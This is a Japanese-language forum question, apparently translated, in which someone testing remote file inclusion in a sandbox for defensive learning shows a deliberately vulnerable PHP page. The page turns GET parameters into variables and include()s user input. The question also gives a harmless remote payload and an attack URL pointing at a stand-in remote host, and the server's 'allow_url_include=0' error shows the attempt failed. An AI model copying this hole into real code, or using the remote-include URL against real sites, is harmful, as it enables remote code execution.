サンドボックスをセットアップし、エクスプロイトを実行しようとしているので、エクスプロイトをより適切に防御する方法をよりよく理解できます。以下を実行すると、プロセスは適切な理由で失敗します。しかし、「適切なエクスプロイトの書き方」があまり見つからないため、よくわかりません。ここに私のコードがあり、以下は失敗時のメッセージです。どんなガイダンスも素晴らしいでしょう。
//unform.php (unprotected form)
<html>
<head>
<title>Try An Exploit</title>
<?php
if (!empty($_GET)){
foreach($_GET as $key=>$value){
${$key} = $value;
}
}
//no sanitizer here.
echo $key;
include($value);
?>
</head>
<body>
<h1>This Is Bad</h1>
<form action="#" method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit" value="Kick Me" />
</form>
</body>
悪用スクリプト、簡単なもの:
exploit.php
<?php
$somevar = "This is just a string";
echo $somevar;
?>
悪意のある人物は、ブラウザのアドレス バーに次のコードをハード コードします。
http://www.sandbox.com/path/to/unform.php?COLOR=http://www.remoteserv.com/exploit.php
アドレスを読み込もうとしたときのブラウザへの出力:
Warning: include() [function.include]: http:// wrapper is disabled in the server configuration by allow_url_include=0
それで、それですか?または、私が注目すべき他のテクニックはありますか?
ありがとう